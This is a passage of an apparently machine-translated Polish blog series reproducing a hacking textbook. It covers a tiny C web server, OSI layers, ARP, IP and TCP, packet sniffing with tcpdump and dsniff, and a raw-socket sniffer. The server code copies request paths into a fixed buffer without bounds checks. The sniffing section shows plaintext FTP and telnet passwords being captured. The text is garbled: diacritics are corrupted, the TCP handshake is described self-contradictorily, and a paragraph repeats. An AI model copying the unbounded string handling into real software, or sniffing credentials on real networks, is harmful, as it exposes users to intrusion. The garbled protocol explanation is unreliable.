ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).

if(strncmp(request, "GET ", 4) == 0) // GET request

ptr = request+4; // ptr is the URL.

if(strncmp(request, "HEAD ", 5) == 0) // HEAD request

ptr = request+5; // ptr is the URL.

if(ptr == NULL) { // Then this is not a recognized request.

printf("\tUNKNOWN REQUEST!\n");

} else { // Valid request, with ptr pointing to the resource name

if (ptr[strlen(ptr) - 1] == '/') // For resources ending with '/',

strcat(ptr, "index.html"); // add 'index.html' to the end.

strcpy(resource, WEBROOT); // Begin resource with web root path

strcat(resource, ptr); // and join it with resource path.

fd = open(resource, O_RDONLY, 0); // Try to open the file.

printf("\tOpening \'%s\'\t", resource);

if(fd == -1) { // If file is not found

printf(" 404 Not Found\n");

send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");

send_string(sockfd, "Server: Tiny webserver\r\n\r\n");

send_string(sockfd, "< html >< head >< title >404 Not Found< /title >< /head >");

send_string(sockfd, "< body >< h1 >URL not found< /h1 >< /body >< /html >\r\n");

} else { // Otherwise, serve up the file.

printf(" 200 OK\n");

send_string(sockfd, "HTTP/1.0 200 OK\r\n");

send_string(sockfd, "Server: Tiny webserver\r\n\r\n");

if(ptr == request + 4) { // Then this is a GET request

if( (length = get_file_size(fd)) == -1)

fatal("getting resource file size");

if( (ptr = (unsigned char *) malloc(length)) == NULL)

fatal("allocating memory for reading resource");

read(fd, ptr, length); // Read the file into memory.

send(sockfd, ptr, length, 0); // Send it to socket.

free(ptr); // Free file memory.

}

close(fd); // Close the file.

} // End if block for file found/not found.

} // End if block for valid request.

} // End if block for valid HTTP.

shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully.

}

/* This function accepts an open file descriptor and returns

* the size of the associated file. Returns -1 on failure.

*/

int get_file_size(int fd) {

struct stat stat_struct;

if(fstat(fd, &stat_struct) == -1)

return -1;

return (int) stat_struct.st_size;

}

Funkcja handle_connection wykorzystuje funkcj� strstr () do wyszukiwania pod�a�cucha HTTP / w buforze ��dania. Funkcja strstr () zwraca wska�nik do pod�a�cucha, kt�ry b�dzie na samym ko�cu ��dania. �a�cuch zostanie tutaj zako�czony, a ��dania HEAD i GET zostan� uznane za przetwarzalne ��dania. ��danie HEAD po prostu zwr�ci nag��wki, a ��danie GET r�wnie� zwr�ci ��dany zas�b (je�li mo�na go znale��). Pliki index.html i image.jpg zosta�y umieszczone w katalogu webroot, jak pokazano na wyj�ciu poni�ej, oraz nast�pnie kompiluje si� program tinyweb. Uprawnienia rootowe s� potrzebne do powi�zania z dowolnym portem poni�ej 1024, wi�c program jest ustawiony na root i wykonany. Wyj�cie debugowania serwera pokazuje wyniki ��dania przegl�darki http://127.0.0.1:

reader@hacking:~/booksrc $ ls -l webroot/

total 52

-rwxr--r-- 1 reader reader 46794 2007-05-28 23:43 image.jpg

-rw-r--r-- 1 reader reader 261 2007-05-28 23:42 index.html

reader@hacking:~/booksrc $ cat webroot/index.html

< html >

< head >< title >A sample webpage< /title >< /head >

< body bgcolor="#000000" text="#ffffffff" >

< center >

< h1 >This is a sample webpage< /h1 >

…and here is some sample text< br >

< br >

…and even a sample image:< br >

< img src="image.jpg" >< br >

< /center >

< /body >

< /html >

reader@hacking:~/booksrc $ gcc -o tinyweb tinyweb.c

reader@hacking:~/booksrc $ sudo chown root ./tinyweb

reader@hacking:~/booksrc $ sudo chmod u+s ./tinyweb

reader@hacking:~/booksrc $ ./tinyweb

Accepting web requests on port 80

Got request from 127.0.0.1:52996 "GET / HTTP/1.1"

Opening './webroot/index.html' 200 OK

Got request from 127.0.0.1:52997 "GET /image.jpg HTTP/1.1"

Opening './webroot/image.jpg' 200 OK

Got request from 127.0.0.1:52998 "GET /favicon.ico HTTP/1.1"

Opening './webroot/favicon.ico' 404 Not Found

Adres 127.0.0.1 jest specjalnym adresem p�tli zwrotnej, kt�ry kieruje si� do komputera lokalnego. Wst�pne ��danie pobiera index.html z serwera WWW, kt�ry z kolei ��da image.jpg. Ponadto przegl�darka automatycznie ��da favicon.ico, aby pobra� ikon� strony internetowej. Poni�szy zrzut ekranu pokazuje wyniki tego ��dania w przegl�darce

Powr�t
08.08.2020

Obieranie dolnej warstwy

Kiedy korzystasz z przegl�darki, wszystkie siedem warstw OSI jest zaj�tych, pozwalaj�c ci skupi� si� na przegl�daniu, a nie na protoko�ach. Na wy�szych warstwach OSI wiele protoko��w mo�e by� tekstem jawnym, poniewa� wszystkie inne szczeg�y po��czenia s� ju� zadbane przez ni�sze warstwy. Gniazda istniej� w warstwie sesji (5), zapewniaj�c interfejs do wysy�ania danych z jednego hosta do drugiego. TCP na warstwie transportowej (4) zapewnia niezawodno�� i kontrol� transportu, podczas gdy IP w warstwie sieciowej (3) zapewnia adresowanie i komunikacj� na poziomie pakietu. Ethernet na warstwie ��cza danych (2) zapewnia adresowanie mi�dzy portami Ethernet, odpowiednie dla podstawowej komunikacji LAN (Local Area Network). U do�u warstwa fizyczna (1) to po prostu przew�d i protok� u�ywany do wysy�ania bit�w z jednego urz�dzenia do drugiego. Pojedyncza wiadomo�� HTTP b�dzie zawijana w wiele warstw, gdy przechodzi przez r�ne aspekty komunikacji. Proces ten mo�na uzna� za skomplikowan� biurokracj� interetow�, przypominaj�c� film "Brazylia". Na ka�dej warstwie znajduje si� wysoce wyspecjalizowana recepcjonistka, kt�ra rozumie tylko j�zyk i protok� tej warstwy. Gdy pakiety danych s� transmitowane, ka�da recepcjonistka wykonuje niezb�dne obowi�zki w swojej konkretnej warstwie, umieszcza pakiet w kopercie wewn�trznej, pisze nag��wek na zewn�trz i przekazuje go do recepcjonisty na nast�pnej warstwie poni�ej. Ten recepcjonista z kolei wykonuje niezb�dne obowi�zki swojej warstwy, wk�ada ca�� kopert� w inn� kopert�, pisze nag��wek na zewn�trz i przekazuje go dalej. Ruch w sieci to rozmowa serwer�w, klient�w i po��cze� peer-to-peer. Na wy�szych warstwach ruch mo�e by� danymi finansowymi, poczt� e-mail lub w zasadzie cokolwiek. Niezale�nie od tego, co zawieraj� pakiety, protoko�y u�ywane w ni�szych warstwach do przenoszenia danych z punktu A do punktu B s� zwykle takie same. Po zrozumieniu biurowej biurokracji tych powszechnych protoko��w ni�szych warstw mo�na zajrze� do wewn�trz przesy�anych kopert, a nawet sfalsyfikowa� dokumenty w celu manipulowania systemem.

Powr�t

09.08.2020

Warstwa ��cza danych

Najni�sz� widoczn� warstw� jest warstwa ��cza danych. Wracaj�c do recepcjonistki i analogii do biurokracji, je�li warstwa fizyczna poni�ej jest uwa�ana za wozy interoffice i warstwa sieciowa powy�ej jako globalny system pocztowy, warstwa ��cza danych to system poczty wewn�trznej. Ta warstwa zapewnia spos�b adresowania i wysy�ania wiadomo�ci do wszystkich os�b w biurze, a tak�e do ustalania, kto jest w biurze. Ethernet istnieje na tej warstwie, zapewniaj�c standardowy system adresowania dla wszystkich urz�dze� Ethernet. Adresy te s� nazywane adresami Media Access Control (MAC). Ka�demu urz�dzeniu Ethernet przypisuje si� globalnie unikalny adres sk�adaj�cy si� z sze�ciu bajt�w, zwykle zapisanych szesnastkowo w postaci xx: xx: xx: xx: xx: xx. Adresy te s� czasami okre�lane jako adresy sprz�towe, poniewa� ka�dy adres jest unikalny dla sprz�tu i jest przechowywany w pami�ci uk�adu scalonego urz�dzenia. Adresy MAC mog� by� uwa�ane za numery ubezpieczenia spo�ecznego dla sprz�tu, poniewa� ka�dy element sprz�tu ma mie� unikalny adres MAC. Nag��wek Ethernet ma 14 bajt�w i zawiera �r�d�owe i docelowe adresy MAC tego pakietu Ethernet. Adresowanie Ethernet zapewnia r�wnie� specjalny adres rozg�oszeniowy, sk�adaj�cy si� ze wszystkich binarnych 1 (ff: ff: ff: ff: ff: ff). Dowolny pakiet Ethernet wys�any na ten adres zostanie wys�any do wszystkich pod��czonych urz�dze�. Adres MAC urz�dzenia sieciowego nie zmienia si�, ale jego adres IP mo�e si� zmienia� regularnie. Koncepcja adres�w IP nie istnieje na tym poziomie, tylko adresy sprz�towe, wi�c potrzebna jest metoda korelacji dw�ch schemat�w adresowania. W biurze poczta wys�ana do pracownika pod adresem biura trafia do w�a�ciwego stanowiska. W sieci Ethernet metoda ta jest znana jako ARP (Address Resolution Protocol). Protok� ten umo�liwia tworzenie "map miejsc docelowych" w celu powi�zania adresu IP z urz�dzeniem. Istniej� cztery r�ne typy wiadomo�ci ARP, ale dwa najwa�niejsze typy to wiadomo�ci ��dania ARP i wiadomo�ci odpowiedzi ARP. Nag��wek Ethernet dowolnego pakietu zawiera warto�� typu opisuj�c� pakiet. Ten typ s�u�y do okre�lenia, czy pakiet jest komunikatem typu ARP, czy te� pakietem IP. ��danie ARP to wiadomo�� wys�ana na adres rozg�oszeniowy, kt�ra zawiera adres IP nadawcy i adres MAC i zasadniczo m�wi: "Hej, kto ma ten adres IP? Je�li to ty, odpowiedz mi i podaj adres MAC". Odpowied� ARP to odpowiednia odpowied�, kt�ra jest wysy�ana na adres MAC requestera (i adres IP), m�wi�c:

"To jest m�j adres MAC i mam ten adres IP." Wi�kszo�� implementacji tymczasowo buforuje pary adres�w MAC / IP otrzymane w odpowiedziach ARP, wi�c ��dania ARP i odpowiedzi nie s� potrzebne dla ka�dego pojedynczego pakietu. Te pami�ci podr�czne s� podobne do tabeli miejsc w interoffice. Na przyk�ad, je�li jeden system ma adres IP 10.10.10.20 i adres MAC 00: 00: 00: aa: aa: aa, a inny system w tej samej sieci ma adres IP 10.10.10.50 i adres MAC 00:00:00 : bb: bb: bb, �aden system nie mo�e komunikowa� si� z drugim, dop�ki nie pozna si� adres�w MAC nawzajem. Je�li pierwszy system chce ustanowi� po��czenie TCP przez IP z adresem IP drugiego urz�dzenia 10.10.10.50, pierwszy system najpierw sprawdzi jego pami�� podr�czn� ARP, aby sprawdzi�, czy wpis istnieje dla 10.10.10.50. Poniewa� to jest pierwszy raz te dwa systemy pr�buj� si� komunikowa�, nie b�dzie takiego wpisu, a ��danie ARP zostanie wys�ane na adres transmisji, m�wi�c: "Je�li jeste� 10.10.10.50, prosz� o odpowied� na mnie o 00: 00: 00: aa : aa: aa. " Poniewa� to ��danie wykorzystuje adres rozg�oszeniowy, ka�dy system w sieci widzi ��danie, ale tylko system z odpowiednim adresem IP ma odpowiada�. W takim przypadku drugi system odpowiada odpowiedzi� ARP, kt�ra jest wysy�ana bezpo�rednio z powrotem do 00: 00: 00: aa: aa: aa, m�wi�c: "Jestem 10.10.10.50 i jestem przy 00: 00: 00: bb: bb: bb. "Pierwszy system odbiera t� odpowied�, buforuje par� adres�w IP i MAC w pami�ci podr�cznej ARP i u�ywa adresu sprz�towego do komunikacji.

Powr�t

10.08.2020

Warstwa sieci

Warstwa sieciowa jest podobna do �wiatowej us�ugi pocztowej, kt�ra zapewnia metod� adresowania i dostarczania u�ywan� do wysy�ania rzeczy wsz�dzie. Protok� u�ywany w tej warstwie do adresowania i dostarczania Internetu jest odpowiednio Protok� internetowy (IP); wi�kszo�� Internetu u�ywa wersji 4 IP. Ka�dy system w Internecie ma adres IP, czterobajtowy uk�ad w postaci xx.xx.xx.xx. Nag��wek IP dla pakiet�w w tej warstwie ma rozmiar 20 bajt�w i sk�ada si� z r�nych p�l i bitflagi zdefiniowane w RFC 791.

Standardowe protoko�y maj� niesamowit� dokumentacj�. Podobny do nag��wka Ethernet, nag��wek IP ma zatem pole protoko�u opisa� typ danych w pakiecie i �r�d�owych i docelowych adres�w dla routingu. Ponadto nag��wek zawiera sum� kontroln�, kt�ra pomaga wykry� b��dy transmisji i pola s�u��ce do fragmentacji pakiet�w. Protok� internetowy jest zwykle u�ywany do przesy�ania pakiet�w owini�tych w wy�sze warstwy. Na tej warstwie istniej� r�wnie� pakiety protoko�u ICMP (Internet Control Message Protocol). Pakiety ICMP s� u�ywane do przesy�ania komunikat�w i diagnostyki. IP chce dotrze� do miejsca docelowego. Je�li wyst�pi problem, pakiet ICMP zostanie odes�any do nadawcy problemu. ICMP jest powszechnie u�ywany do testowania ��czno�ci. Komunikaty ICMP Echo Request i Echo Reply s� u�ywane przez narz�dzie o nazwie ping. Wysy�aj�c ��danie echa ICMP. Po otrzymaniu ��dania echa ICMP zdalny host odsy�a z powrotem do odpowiedzi ICMP Echo. Komunikaty te mo�na wykorzysta� do okre�lenia op�nienia mi�dzy dwoma hostami. Nale�y jednak pami�ta�, �e zar�wno ICMP, jak i IP s� bezpo��czeniowe; ca�a ta warstwa protoko�u naprawd� dba o pakiet do jego adresu docelowego. Czasami ��cze sieciowe chce mie� ograniczenie wielko�ci pakietu, uniemo�liwiaj�c przesy�anie du�ych pakiet�w. IP mo�e poradzi� sobie z t� sytuacj� poprzez fragmentacj� pakiet�w. Ka�dy fragment ma inn� warto�� przesuni�cia fragmentu, kt�ra jest przechowywana w nag��wku. Kiedy odbiorca odbiera te fragmenty, warto�ci przesuni�cia s� u�ywane do ponownego po��czenia oryginalnego pakietu IP. Przepisy traktuj� jako pomoc fragmentacyjn� w dostarczaniu pakiet�w IP, ale nie oznacza to utrzymywania po��cze� ani zapewniania dostawy. To jest zadanie protoko��w w warstwie transportowej.

Powr�t

11.08.2020

Warstwa transportowa

Warstwa transportowa mo�e by� uwa�ana za pierwsz� lini� recepcjonistek biurowych, zbieraj�c� poczt� z warstwy sieci. Je�li klient chce zwr�ci� wadliwy towar, wysy�a wiadomo�� z pro�b� o numer RMA (Return Material Authorization). Nast�pnie recepcjonista pod��y�by za protoko�em zwrotnym, prosz�c o pokwitowanie i ostatecznie wydaj�c numer RMA, aby klient m�g� wys�a� produkt. Poczta zajmuje si� tylko wysy�aniem tych wiadomo�ci (i paczek) tam i z powrotem, a nie z tym, co jest w �rodku. im. Dwa g��wne protoko�y w tej warstwie to protok� TCP (Transmission Control Protocol) i protok� UDP (User Datagram Protocol). TCP jest najcz�ciej u�ywanym protoko�em dla us�ug w Internecie: telnet, HTTP (ruch sieciowy), SMTP (ruch pocztowy) i FTP (transfery plik�w) u�ywaj� TCP. Jednym z powod�w popularno�ci TCP jest to, �e zapewnia przejrzyste, ale niezawodne i dwukierunkowe po��czenie mi�dzy dwoma adresami IP. Gniazda strumieniowe korzystaj� z po��cze� TCP / IP. Dwukierunkowe po��czenie z TCP jest podobne do korzystania z telefonu - po wybraniu numeru nawi�zane zostaje po��czenie, za po�rednictwem kt�rego obie strony mog� si� komunikowa�. Niezawodno�� oznacza po prostu, �e TCP zapewni, �e wszystkie dane dotr� do celu w odpowiedniej kolejno�ci. Je�li pakiety po��czenia zostan� pomieszane i przestan� dzia�a�, TCP upewni si�, �e s� one przywr�cone, zanim przeka�e dane do nast�pnej warstwy. Je�li niekt�re pakiety w trakcie po��czenia zostan� utracone, odbiorca zatrzyma pakiety, kt�re ma, a �r�d�o ponownie przesy�a brakuj�ce pakiety. Ca�a ta funkcjonalno�� jest mo�liwa dzi�ki zestawowi flag, nazwanym flagami TCP i warto�ciom �ledzenia nazwanym numerami sekwencji. Flagi TCP s� nast�puj�ce:

Flaga TCP : Znaczenie : Cel

URG : Pilne : Identyfikuje wa�ne dane

ACK : Potwierdzenie : Potwierdza pakietu; jest w��czony dla wi�kszo�ci po��cze�

PSH : Push : M�wi odbiornikowi, aby przepchn�� dane zamiast go buforowa�

RST : Reset : Resetuje po��czenie

SYN : Synchronizacja : Synchronizuje numery porz�dkowe na pocz�tku po��czenia

FIN : Finish : Z wdzi�kiem zamyka po��czenie, gdy obie strony si� �egnaj�

Flagi te s� przechowywane w nag��wku TCP wraz z portami �r�d�owym i docelowym. Nag��wek TCP jest okre�lony w RFC 793. Numer sekwencyjny i numer potwierdzenia s� u�ywane do utrzymania stanu. Flagi SYN i ACK s� u�ywane razem do otwierania po��cze� w trzystopniowym procesie uzgadniania. Gdy klient chce otworzy� po��czenie z serwerem, zostaje wys�any pakiet z flag� SYN, ale flaga ACK jest wysy�ana na serwer. Nast�pnie serwer odpowiada pakietem, kt�ry ma w��czone zar�wno flagi SYN, jak i ACK. Aby zako�czy� po��czenie, klient odsy�a pakiet z flag� SYN, ale flaga ACK jest w��czona. Nast�pnie ka�dy pakiet w po��czeniu b�dzie mia� w��czon� flag� ACK i flaga SYN zostanie wy��czona. Tylko pierwsze dwa pakiety po��czenia maj� w��czon� flag� SYN, poniewa� te pakiety s�u�� do synchronizacji numer�w sekwencji

Numery sekwencji umo�liwiaj� TCP umieszczanie nieuporz�dkowanych pakiet�w z powrotem w kolejno�ci, aby ustali�, czy brakuje pakiet�w i zapobiec mieszaniu pakiet�w z innych po��cze�. Po zainicjowaniu po��czenia ka�da ze stron generuje pocz�tkowy numer sekwencji. Liczba ta jest przekazywana drugiej stronie w pierwszych dw�ch pakietach SYN uzgodnienia po��czenia. Nast�pnie, przy ka�dym wysy�anym pakiecie, numer sekwencji jest zwi�kszany o liczb� bajt�w znalezionych w cz�ci danych pakietu. Ten numer sekwencji znajduje si� w nag��wku pakietu TCP. Ponadto ka�dy nag��wek TCP ma numer potwierdzenia, kt�ry jest po prostu numerem kolejnym strony przeciwnej plus jeden. Protok� TCP doskonale sprawdza si� w aplikacjach, w kt�rych wymagana jest niezawodno�� i komunikacja dwukierunkowa. Koszt tej funkcji jest jednak pokryty w kosztach komunikacji. UDP ma znacznie mniej narzut�w i wbudowan� funkcjonalno�� ni� TCP. Ten brak funkcjonalno�ci sprawia, �e zachowuje si� podobnie do protoko�u IP: jest bezpo��czeniowy i niewiarygodny. Bez wbudowanej funkcji tworzenia po��cze� i utrzymania niezawodno�ci, UDP jest alternatyw�, kt�ra oczekuje, �e aplikacja poradzi sobie z tymi problemami. Czasami po��czenia nie s� potrzebne, a lekki protok� UDP jest o wiele lepszym protoko�em w takich sytuacjach. Nag��wek UDP zdefiniowany w RFC 768 jest stosunkowo ma�y. Zawiera tylko cztery 16-bitowe warto�ci w nast�puj�cej kolejno�ci: port �r�d�owy, port docelowy, d�ugo�� i suma kontrolna.

Powr�t

12.08.2020

Network Sniffing

Na warstwie ��cza danych znajduje si� rozr�nienie mi�dzy sieciami prze��czanymi i niepod��czonymi. W sieci niezwi�zanej pakiety Ethernet przechodz� przez ka�de urz�dzenie w sieci, oczekuj�c, �e ka�de urz�dzenie systemowe b�dzie tylko patrzy�o na pakiety wys�ane na adres docelowy. Jednak do�� trywialne jest ustawienie urz�dzenia w trybie mieszanym, co powoduje, �e b�dzie on patrzy� na wszystkie pakiety, niezale�nie od adresu docelowego. Wi�kszo�� program�w przechwytywania pakiet�w, takich jak tcpdump, domy�lnie upuszcza urz�dzenie, kt�rego nas�uchuj�, do trybu mieszanego. Tryb promiscuous mo�na ustawi� za pomoc� polecenia ifconfig, jak wida� na poni�szym wyj�ciu

reader@hacking:~/booksrc $ ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:17115 errors:0 dropped:0 overruns:0 frame:0

TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:4602913 (4.3 MiB) TX bytes:434449 (424.2 KiB)

Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc

reader@hacking:~/booksrc $ ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65

UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1

RX packets:17181 errors:0 dropped:0 overruns:0 frame:0

TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:4668475 (4.4 MiB) TX bytes:434449 (424.2 KiB)

Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $

Akt przechwytywania pakiet�w, kt�re niekoniecznie s� przeznaczone do publicznego ogl�dania, nazywa si� w�chaniem. Sniffowanie pakiet�w w trybie mieszanym w sieci niezwi�zanej z sieci� mo�e dostarczy� r�nego rodzaju u�ytecznych informacji, jak pokazuje poni�szy wynik.

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192.168.0.118'

tcpdump: listening on eth0

21:27:44.684964 192.168.0.118.ftp > 192.168.0.193.32778: P 1:42(41) ack 1 win

17316 < nop,nop,timestamp 466808 920202> (DF)

0x0000 4500 005d e065 4000 8006 97ad c0a8 0076 E..].e@........v

0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8 ........)..s^...

0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78 ..C../.........x

0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420 ....220.TYPSoft.

0x0040 4654 5020 5365 7276 6572 2030 2e39 392e FTP.Server.0.99.

0x0050 3133 13

21:27:44.685132 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 42 win 5840

< nop,nop,timestamp 920662 466808> (DF) [tos 0x10]

0x0000 4510 0034 966f 4000 4006 21bd c0a8 00c1 E..4.o@.@.!.....

0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56 ...............V

0x0030 0007 1f78 ...x

21:27:52.406177 192.168.0.193.32778 > 192.168.0.118.ftp: P 1:13(12) ack 42 win

5840 < nop,nop,timestamp 921434 466808> (DF) [tos 0x10]

0x0000 4510 0040 9670 4000 4006 21b0 c0a8 00c1 E..@.p@.@.!...

0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c ...v....^...)...

0x0020 8018 16d0 edd9 0000 0101 080a 000e 0f5a ...............Z

0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a ...xUSER.leech..

21:27:52.415487 192.168.0.118.ftp > 192.168.0.193.32778: P 42:76(34) ack 13

win 17304 (DF)

0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076 E..V..@....m...v

0x0010 c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4 ........)...^...

0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5 ..C.N,..........

0x0030 000e 0f5a 3333 3120 5061 7373 776f 7264 ...Z331.Password

0x0040 2072 6571 7569 7265 6420 666f 7220 6c65 .required.for.le

0x0050 6563 ec

21:27:52.415832 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 76 win 5840

< nop,nop,timestamp 921435 466885> (DF) [tos 0x10]

0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1 E..4.q@.@.!.....

0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe ...v....^...)...

0x0020 8010 16d0 7e5b 0000 0101 080a 000e 0f5b ....~[.........[

0x0030 0007 1fc5 ....

21:27:56.155458 192.168.0.193.32778 > 192.168.0.118.ftp: P 13:27(14) ack 76

win 5840 < nop,nop,timestamp 921809 466885> (DF) [tos 0x10]

0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1 E..B.r@.@.!.....

0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe ...v....^...)...

0x0020 8018 16d0 90b5 0000 0101 080a 000e 10d1 ................

0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465 ....PASS.l8@nite

0x0040 0d0a ..

21:27:56.179427 192.168.0.118.ftp > 192.168.0.193.32778: P 76:103(27) ack 27

win 17290 < nop,nop,timestamp 466923 921809> (DF)

0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076 E..O..@....T...v

0x0010 c0a8 00c1 0015 800a 292e 8abe 5ed4 9d02 ........)...^...

0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb ..C.L...........

0x0030 000e 10d1 3233 3020 5573 6572 206c 6565 ....230.User.lee

0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a ch.logged.in...

Dane przesy�ane przez sie� za po�rednictwem us�ug takich jak telnet, FTP i POP3 s� niezaszyfrowane. W poprzednim przyk�adzie pijawka u�ytkownika jest widoczna podczas logowania do serwera FTP przy u�yciu has�a l8 @ nite. Poniewa� proces uwierzytelniania podczas logowania jest r�wnie� niezaszyfrowany, nazwy u�ytkownika i has�a s� po prostu zawarte w cz�ciach danych przesy�anych pakiet�w. tcpdump to wspania�y sniffer pakiet�w o uniwersalnym zastosowaniu, ale istniej� wyspecjalizowane narz�dzia do w�chania zaprojektowane specjalnie do wyszukiwania nazw u�ytkownik�w i hase�. Jednym z godnych uwagi przyk�ad�w jest program Dug Song, dsniff, kt�ry jest wystarczaj�co inteligentny, aby przeanalizowa� dane, kt�re wygl�daj� na wa�ne.

reader@hacking:~/booksrc $ sudo dsniff -n

dsniff: listening on eth0

-----------------

12/10/02 21:43:21 tcp 192.168.0.193.32782 -> 192.168.0.118.21 (ftp)

USER leech

PASS l8@nite

-----------------

12/10/02 21:47:49 tcp 192.168.0.193.32785 -> 192.168.0.120.23 (telnet)

USER root

PASS 5eCr3t

Powr�t

13.08.2020

Raw Socket Sniffer

Do tej pory w naszych przyk�adach kodu u�ywali�my gniazd strumieniowych. Podczas wysy�ania i odbierania za pomoc� gniazd strumieniowych dane s� starannie zapakowane w po��czenie TCP / IP. Uzyskuj�c dost�p do modelu OSI warstwy sesji (5), system operacyjny zajmuje si� wszystkimi szczeg�ami transmisji, korekcji i routingu na ni�szym poziomie. Mo�liwe jest uzyskanie dost�pu do sieci w ni�szych warstwach przy u�yciu nieprzetworzonych gniazd. Przy tej dolnej warstwie wszystkie szczeg�y s� ods�oni�te i musz� by� obs�ugiwane bezpo�rednio przez programist�. Surowe gniazda s� okre�lone za pomoc� SOCK_RAW jako typ. W takim przypadku protok� ma znaczenie, poniewa� istnieje wiele opcji. Protok� mo�e by� protoko�em IPPROTO_TCP, IPPROTO_UDP lub IPPROTO_ICMP. Nast�puj�cy przyk�ad to program pods�uchuj�cy TCP u�ywaj�cy surowych gniazd

raw_tcpsniff.c

#include < stdio.h >

#include < stdlib.h >

#include < string.h >

#include < sys/socket.h >

#include < netinet/in.h >

#include < arpa/inet.h >

#include "hacking.h"

int main(void) {

int i, recv_length, sockfd;

u_char buffer[9000];

if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)

fatal("in socket");

for(i=0; i < 3; i++) {

recv_length = recv(sockfd, buffer, 8000, 0);

printf("Got a %d byte packet\n", recv_length);

dump(buffer, recv_length);

}

}

Ten program otwiera surowe gniazdo TCP i nas�uchuje trzech pakiet�w, drukuj�c surowe dane ka�dego z nich za pomoc� funkcji dump (). Zauwa�, �e bufor jest zadeklarowany jako zmienna u_char. Jest to po prostu definicja typu wygody z sys / socket.h, kt�ra rozwija si� do "unsigned char". Jest to dla wygody, poniewa� niepodpisane zmienne s� cz�sto u�ywane w programowaniu sieciowym, a pisanie bez znaku za ka�dym razem jest uci��liwe. Po skompilowaniu program musi by� uruchamiany jako root, poniewa� u�ycie surowych gniazd wymaga uprawnie� administratora. Poni�sze dane wyj�ciowe pokazuj� program wykrywaj�cy sie� podczas wysy�ania przyk�adowego tekstu do naszego prostego_serwera

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff.c

reader@hacking:~/booksrc $ ./raw_tcpsniff

[!!] Fatal Error in socket: Operation not permitted

reader@hacking:~/booksrc $ sudo ./raw_tcpsniff

Got a 68 byte packet

45 10 00 44 1e 36 40 00 40 06 46 23 c0 a8 2a 01 | E..D.6@.@.F#..*.

c0 a8 2a f9 8b 12 1e d2 ac 14 cf 92 e5 10 6c c9 | ..*...........l.

80 18 05 b4 32 47 00 00 01 01 08 0a 26 ab 9a f1 | ....2G......&...

02 3b 65 b7 74 68 69 73 20 69 73 20 61 20 74 65 | .;e.this is a te

73 74 0d 0a | st..

Got a 70 byte packet

45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E..F.7@.@.F ..*.

c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 | ..*...........l.

80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 | ....'.......&..u

02 3c 1b 28 41 41 41 41 41 41 41 41 41 41 41 41 | .<.(AAAAAAAAAAAA

41 41 41 41 0d 0a | AAAA..

Got a 71 byte packet

45 10 00 47 1e 38 40 00 40 06 46 1e c0 a8 2a 01 | E..G.8@.@.F...*.

c0 a8 2a f9 8b 12 1e d2 ac 14 cf b4 e5 10 6c c9 | ..*...........l.

80 18 05 b4 68 45 00 00 01 01 08 0a 26 ab b6 e7 | ....hE......&...

02 3c 20 ad 66 6a 73 64 61 6c 6b 66 6a 61 73 6b | .< .fjsdalkfjask

66 6a 61 73 64 0d 0a | fjasd..

reader@hacking:~/booksrc $

Podczas gdy ten program przechwytuje pakiety, nie jest niezawodny i ominie niekt�re pakiety, szczeg�lnie gdy wyst�puje du�y ruch. Ponadto przechwytuje tylko pakiety TCP - aby przechwytywa� pakiety UDP lub ICMP, nale�y otworzy� dodatkowe gniazda nieprzetworzone dla ka�dego z nich. Innym powa�nym problemem z surowymi gniazdami jest to, �e s� one niesp�jne mi�dzy systemami. Kod gniazda dla Linuxa najprawdopodobniej nie zadzia�a w BSD lub Solaris. To sprawia, �e wieloplatformowe programowanie z surowymi gniazdami jest prawie niemo�liwe. Podczas gdy ten program przechwytuje pakiety, nie jest niezawodny i ominie niekt�re pakiety, szczeg�lnie gdy wyst�puje du�y ruch. Ponadto przechwytuje tylko pakiety TCP - aby przechwytywa� pakiety UDP lub ICMP, nale�y otworzy� dodatkowe gniazda nieprzetworzone dla ka�dego z nich. Innym powa�nym problemem z surowymi gniazdami jest to, �e s� one niesp�jne mi�dzy systemami. Kod gniazda dla Linuxa najprawdopodobniej nie zadzia�a w BSD lub Solaris. To sprawia, �e wieloplatformowe programowanie z surowymi gniazdami jest prawie niemo�liwe

Powr�t

14.08.2020

libpcap Sniffer

